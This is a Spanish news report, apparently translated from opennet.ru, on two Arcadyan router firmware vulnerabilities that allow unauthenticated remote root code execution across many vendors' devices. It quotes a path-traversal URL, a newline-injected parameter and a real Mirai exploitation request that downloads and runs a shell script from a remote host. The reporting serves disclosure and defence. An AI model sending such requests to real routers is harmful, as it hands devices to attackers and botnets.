Vulnerabilidad en routers domésticos que afecta a 17 fabricantes

Se ha registrado un ataque masivo en routers domésticos cuyas versiones emplean una implementación del servidor http por parte de Arcadyan. Para obtener control sobre los dispositivos, se utiliza una combinación de dos vulnerabilidades que permiten ejecutar código arbitrario de forma remota con privilegios de root. El problema afecta a un amplio rango de routers ADSL de las empresas Arcadyan, ASUS y Buffalo, así como a dispositivos suministrados bajo las marcas Beeline (el problema ha sido confirmado en Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone y otros operadores de telecomunicaciones. Se ha destacado que esta vulnerabilidad ha estado presente en las versiones de Arcadyan durante más de 10 años y ha llegado a estar en al menos 20 modelos de dispositivos de 17 fabricantes diferentes.

La primera vulnerabilidad CVE-2021-20090 permite acceder a cualquier script de la interfaz web sin pasar por la autenticación. La esencia de la vulnerabilidad radica en que en la interfaz web algunos directorios, desde los cuales se proporcionan imágenes, archivos CSS y scripts JavaScript, son accesibles sin autenticación. Además, la verificación de los directorios para los cuales se permite el acceso sin autenticación se realiza mediante una máscara inicial. El uso de caracteres "..\/" en las rutas para navegar al directorio padre es bloqueado por el firmware, pero se permite la combinación "..". De este modo, existe la posibilidad de abrir páginas protegidas al enviar solicitudes similares a "http:\/\/192.168.1.1\/images\/..index.htm".

La segunda vulnerabilidad CVE-2021-20091 permite que un usuario autenticado modifique la configuración del sistema del dispositivo mediante el envío de parámetros especialmente formateados al script apply_abstract.cgi, que no verifica la presencia de un carácter de nueva línea en los parámetros. Por ejemplo, un atacante puede especificar en el campo del IP que se está verificando el valor "192.168.1.2ARC_SYS_TelnetdEnable=1" al realizar una operación ping, y el script al crear el archivo de configuración \/tmp\/etc\/config\/.glbcfg escribirá en él la línea "AARC_SYS_TelnetdEnable=1", que activa. servidor telnetd, que proporciona acceso ilimitado a la shell de comandos con privilegios de root. De manera similar, al establecer el parámetro AARC_SYS se puede ejecutar cualquier código en el sistema. La primera vulnerabilidad permite ejecutar un script problemático sin autenticación, accediendo a él como «/images/..apply_abstract.cgi».

Para explotar las vulnerabilidades, el atacante debe tener la capacidad de enviar una solicitud al puerto de red en el que se ejecuta la interfaz web. Según la dinámica de propagación del ataque, muchos operadores dejan el acceso desde la red externa en sus dispositivos para facilitar el diagnóstico de problemas por parte del servicio de soporte. Con acceso restringido a la interfaz solo para la red interna, el ataque puede llevarse a cabo desde la red externa mediante la técnica de «DNS rebinding». Las vulnerabilidades ya están siendo utilizadas activamente para conectar enrutadores a la botnet Mirai: POST /images/..apply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time5&ARC_ping_ipaddress=212.192.241.7 ARC_SYS_TelnetdEnable=1& ARC_SYS_=cd+/tmp; wget http://212.192.241.72/lolol.sh; curl -O http://212.192.241.72/lolol.sh; chmod 777 lolol.sh; sh lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

Fuente: opennet.ru

Compra un hosting fiable para sitios web con protección contra DDoS, servidores VPS VDS 🔥 Compra un hosting fiable para sitios web con protección contra DDoS, servidores VPS VDS | ProHoster